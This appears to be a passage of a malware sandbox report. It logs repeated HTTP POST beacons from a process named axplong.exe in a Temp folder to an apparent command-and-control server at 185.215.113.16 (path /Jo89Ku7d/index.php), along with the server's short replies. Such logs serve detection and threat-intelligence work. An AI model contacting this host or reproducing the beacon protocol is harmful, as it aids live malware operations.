                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  13 | 192.168.2.6 | 65073 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:17.934891939 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:19.731122971 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:18 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:19.731821060 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:18 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:19.731959105 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:19.731976032 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:18 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:19.733408928 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:18 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:19.964298010 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:19 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  14 | 192.168.2.6 | 65074 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:20.075298071 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:20.784742117 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:20 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:20.786175966 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:21.025149107 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:20 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  15 | 192.168.2.6 | 65075 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:21.137820005 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:21.838718891 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:21 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:21.841479063 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:22.065246105 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:21 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  16 | 192.168.2.6 | 65076 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:22.185002089 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:22.900418043 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:22 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:22.901308060 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:23.133434057 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:23 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  17 | 192.168.2.6 | 65077 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:23.247329950 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:23.958262920 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:23 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:23.959089994 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:24.190504074 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:24 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  18 | 192.168.2.6 | 65079 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:24.312181950 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:25.010644913 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:24 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:25.011596918 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:25.251305103 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:25 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  19 | 192.168.2.6 | 65080 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:25.372445107 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:26.080391884 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:25 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:26.081221104 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:26.311265945 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:26 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  20 | 192.168.2.6 | 65081 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:26.419950962 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:27.127243996 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:27 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:27.128163099 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:27.357180119 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:27 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  21 | 192.168.2.6 | 65082 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:27.466196060 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:28.160341978 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:28 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:28.161339045 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:28.385201931 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:28 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  22 | 192.168.2.6 | 65083 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:28.497158051 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:29.205689907 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:29 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:29.206495047 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:29.434858084 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:29 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  23 | 192.168.2.6 | 65084 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:29.545265913 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:30.236643076 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:30 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:30.255404949 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:30.479671955 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:30 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  24 | 192.168.2.6 | 65085 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:30.593281031 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:31.315900087 CEST | 219 | IN | HTTP/1.1 200 OK
